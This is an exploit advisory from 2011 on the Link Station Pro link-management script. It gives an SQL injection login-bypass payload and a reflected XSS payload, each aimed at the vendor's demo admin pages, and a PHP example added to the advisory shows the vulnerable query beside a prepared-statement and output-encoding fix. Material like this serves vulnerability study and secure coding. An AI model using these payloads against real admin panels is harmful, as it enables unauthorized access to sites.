
# Title : Link Station Pro Multiple Vulnerabilities
# Published : 2011-07-30
# Author :

# Exploit Title: Link Station Pro Multiple Vulnerabilities
# Vendor:  www.linkstationpro.com
# Date: 28th July, 2011
# Author: $#4d0//[r007k17] a.k.a Raghavendra Karthik D (http://www.shadowrootkit.wordpress.com)
# Google Dork:  ? 2011 Copyright SteveDawson.com
*****************************************************************************************************************************************************************************************
BRIEF DESCRIPTION
*****************************
 Link Station Pro is without doubt, the most efficient, easiest and most
configurable reciprocal link management tool available for all your
reciprocal link requirements.

******************************************************************************************************************************************************************************************

(Auth ByPass) SQLi Vulnerability
***************************************
{DEMO} : http://www.linkstationpro.com/Partners/admindemo/index.php

EXPLOIT:
                 Username: ' or 'bug'='bug' #
                 Password: ' or 'bug'='bug' #
Observe: An attacker can use this authentication bypass to get into the
site's admin panel.

Reflected XSS Vulnerability
********************************
EXPLOIT 2: XSS vulnerability in the admin panel (in most of the text fields)

   {Demo}: http://www.linkstationpro.com/Partners/admindemo/manage_categories.php
    Exploit:  ">><marquee><h1>XSSed_by_r007k17</h1></marquee>
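
The fix side of both findings above, as an added example; it is not code from the advisory or from Link Station Pro. It assumes a PHP application using PDO and a MySQL back end (implied by the `#` comment marker). The `admins` table, its columns and the function names are hypothetical, and an in-memory SQLite database (requires pdo_sqlite) stands in so the block runs offline.

```php
<?php
declare(strict_types=1);
// Added example: table, column and function names are hypothetical.

// BEFORE (assumed pattern): request input concatenated into the SQL text.
function vulnerable_login_sql(string $user, string $pass): string {
    return "SELECT id FROM admins WHERE username = '$user' AND password = '$pass'";
}

// AFTER: the username is a bound parameter, never SQL text, and the
// password is checked against a stored hash instead of compared in SQL.
function login(PDO $db, string $user, string $pass): bool {
    $stmt = $db->prepare('SELECT password_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();   // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

// AFTER: encode on output so markup in a field value renders as text.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed test data; SQLite is only a stand-in for the real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admins (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password_hash TEXT)');
$ins = $db->prepare('INSERT INTO admins (username, password_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

$probe = "' or 'bug'='bug' #";   // login input quoted in the advisory

// Concatenated: the quote closes the string literal, OR adds a tautology,
// and MySQL ignores everything after '#', so the password test is dropped.
echo vulnerable_login_sql($probe, $probe), "\n";

// Bound: the same input is only an unusual username, so no row matches.
var_dump(login($db, $probe, $probe));
var_dump(login($db, 'admin', 'correct horse'));

// The text-field input quoted in the advisory, encoded for HTML output.
echo h('">><marquee><h1>XSSed_by_r007k17</h1></marquee>'), "\n";
```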

*****************************************************************************************************************************************************************************************
gr33t1ngs to s1d3 effects and my friends@!3.14--
*****************************************************************************************************************************************************************************************